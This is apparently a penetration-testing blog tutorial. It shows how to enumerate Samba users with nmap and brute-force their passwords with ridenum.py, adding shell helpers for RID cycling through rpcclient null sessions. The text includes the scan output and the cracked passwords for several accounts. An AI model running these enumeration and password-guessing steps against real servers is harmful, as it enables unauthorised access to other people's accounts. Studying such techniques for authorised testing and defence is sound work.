Friday, October 4, 2019

Brute Force Samba User Accounts with ridenum.py

Finding Samba users with NMAP

We can use nmap to enumerate Samba user names on the remote host with the NSE script smb-enum-users. The script opens an SMB session (anonymous here, since no credentials are given) and pulls the account list over MSRPC, first through SAMR and, if that is refused, by cycling RIDs through LSA lookups, so it only returns names when the server lets an unauthenticated client do one of the two.

root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.0027s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-enum-users: 
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description: 
|     Flags:       Normal user account
|   ASUS\hayden (RID: 1002)
|     Full name:   hayden sutton
|     Description: 
|     Flags:       Normal user account
|   ASUS\jared (RID: 1003)
|     Full name:   jared beck
|     Description: 
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description: 
|     Flags:       Normal user account
|   ASUS\sasha (RID: 1004)
|     Full name:   sasha kim
|     Description: 
|     Flags:       Normal user account
|   ASUS\vance (RID: 1005)
|     Full name:   vance perkins
|     Description: 
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
root@asus:~/unix%

Once we have the list of users on the Samba server we can move on to brute forcing their passwords. Save the names, one per line in DOMAIN\user form, to a file (samba.txt below); the list should look like so.

ASUS\clare
ASUS\sam
ASUS\sasha
ASUS\vance
ASUS\jared
ASUS\hayden
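Rather than retyping the names from the scan, the list can be pulled straight out of the nmap output. The script below is an added example and is not part of the original post: it assumes the scan was saved with nmap's -oN option (the plain-text format shown above) and keeps every DOMAIN\user line the smb-enum-users script printed, in the same form the samba.txt username file uses. The scan text embedded in it is a constructed, trimmed copy of the output above.

```shell
#!/bin/sh
# Build the username file for ridenum.py from nmap smb-enum-users output.
# Added example, not from the original post; assumes the -oN text format
# shown above, where each account appears as "|   DOMAIN\user (RID: n)".

# Read smb-enum-users output on stdin, print DOMAIN\user one per line.
# The pattern anchors on the "(RID: n)" suffix, so the Full name /
# Description / Flags lines and the "| smb-enum-users:" header are skipped.
extract_smb_users() {
    sed -n 's/^|[ _]*\([A-Za-z0-9_.-]*\\[A-Za-z0-9_.$-]*\) (RID: [0-9]*) *$/\1/p'
}

# Same accounts as "RID DOMAIN\user", sorted numerically by RID, so you can
# see how wide a RID range a later cycling run actually needs to cover.
extract_smb_users_rids() {
    sed -n 's/^|[ _]*\([A-Za-z0-9_.-]*\\[A-Za-z0-9_.$-]*\) (RID: \([0-9]*\)) *$/\2 \1/p' \
        | sort -n
}

# Lowest and highest RID seen, printed as "LOW HIGH", for a tighter
# start_rid/end_rid pair than the 500 50000 used in the post.
rid_range() {
    extract_smb_users_rids | awk 'NR == 1 { lo = $1 } { hi = $1 } END { if (NR) print lo, hi }'
}

# Constructed sample: a trimmed copy of the scan above.
sample_nmap_output() {
    cat <<'EOF'
Host script results:
| smb-enum-users: 
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description: 
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description: 
|_    Flags:       Normal user account
EOF
}

# Usage against a real scan (paths and target as in the post):
#   nmap -sU -sS --script=smb-enum-users -p U:137,T:139 -oN scan.txt 48.21.33.124
#   extract_smb_users < scan.txt > samba.txt
#   ./ridenum.py 48.21.33.124 $(rid_range < scan.txt) /home/sam/rock.txt samba.txt
```

The regex deliberately requires the "(RID: n)" suffix rather than matching anything after "ASUS\", so a Description field that happens to contain a backslash does not end up in the wordlist.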

Using ridenum.py to brute force Samba user accounts

RID Enum (ridenum.py, from TrustedSec) is a RID cycling tool. Over a null session it asks the server for its domain SID, then appends each RID from a chosen range to that SID and asks the server to resolve the result back to a name; because the lookup goes through LSA rather than SAMR, it recovers account names even on hosts that refuse direct user enumeration. Usage is ridenum.py <server_ip> <start_rid> <end_rid> [password_file] [username_file]: when a password file is given, it tries each password against every account it found, and a username file supplies extra names to try. Below we cycle RIDs 500 through 50000 against the target, using rock.txt as the wordlist and the samba.txt list built above. On a server with an account lockout policy a wordlist of that size will lock out every account it touches, so check the policy (or use a short list) before running it.

root@asus:~/src/ridenum% ./ridenum.py 48.21.33.124 500 50000 /home/sam/rock.txt /home/sam/samba.txt
[*] Successfully guessed username: ASUS\sasha with password of: master
[*] Successfully guessed username: ASUS\vance with password of: sonics
[*] Successfully guessed username: ASUS\jared with password of: attlabs
[*] Successfully guessed username: ASUS\hayden with password of: manager
[*] We got some accounts, exported results to 48.21.33.124_success_results_txt
[*] All accounts extracted via RID cycling have been exported to 48.21.33.124_users.txt
root@asus:~/src/ridenum% 
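What ridenum.py automates can be done by hand with rpcclient from the samba package, which is also the program ridenum.py calls for the cycling. The example below is added here and is not ridenum's own code: it assumes a null session is permitted, that the domain SID has already been obtained (rpcclient's lsaquery command returns it), and that rpcclient prints lookupsids results as "SID DOMAIN\name (type)", with type 1 for user accounts and "*unknown*\*unknown* (8)" for RIDs that do not exist. The domain SID and the rpcclient output embedded in it are constructed.

```shell
#!/bin/sh
# RID cycling by hand with rpcclient, the steps ridenum.py automates.
# Added example, not from the original post or from ridenum.

# Build one SID per line for RIDs $2..$3 under domain SID $1. rpcclient's
# lookupsids resolves many SIDs in a single call, so a range is sent as one
# request instead of one round trip per RID.
rid_sids() {
    sid="$1"; rid="$2"; end="$3"
    while [ "$rid" -le "$end" ]; do
        printf '%s-%s\n' "$sid" "$rid"
        rid=$((rid + 1))
    done
}

# Parse rpcclient lookupsids output read on stdin. Keep only type 1 (user)
# results and print "RID DOMAIN\user"; groups (type 2), aliases (4) and
# non-existent RIDs ("*unknown*\*unknown* (8)") are dropped.
parse_lookupsids() {
    awk '$3 == "(1)" { n = split($1, p, "-"); print p[n], $2 }'
}

# Constructed sample of what a cycle over RIDs 513 and 1000-1006 returns:
# a group, two users and a RID that maps to nothing.
sample_lookupsids_output() {
    cat <<'EOF'
S-1-5-21-1111111111-2222222222-3333333333-513 ASUS\None (2)
S-1-5-21-1111111111-2222222222-3333333333-1000 ASUS\sam (1)
S-1-5-21-1111111111-2222222222-3333333333-1001 ASUS\clare (1)
S-1-5-21-1111111111-2222222222-3333333333-1006 *unknown*\*unknown* (8)
EOF
}

# Against a live host (not run here), with DOMAIN_SID from "rpcclient -U '' -N host -c lsaquery":
#   DOMAIN_SID="S-1-5-21-1111111111-2222222222-3333333333"   # constructed
#   rpcclient -U "" -N 48.21.33.124 \
#       -c "lookupsids $(rid_sids "$DOMAIN_SID" 1000 1050 | tr '\n' ' ')" | parse_lookupsids
```

Cycling in batches of a few dozen RIDs per lookupsids call keeps each request small; ranges with long runs of "(8)" results mean you have passed the last allocated RID and can stop well short of 50000.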
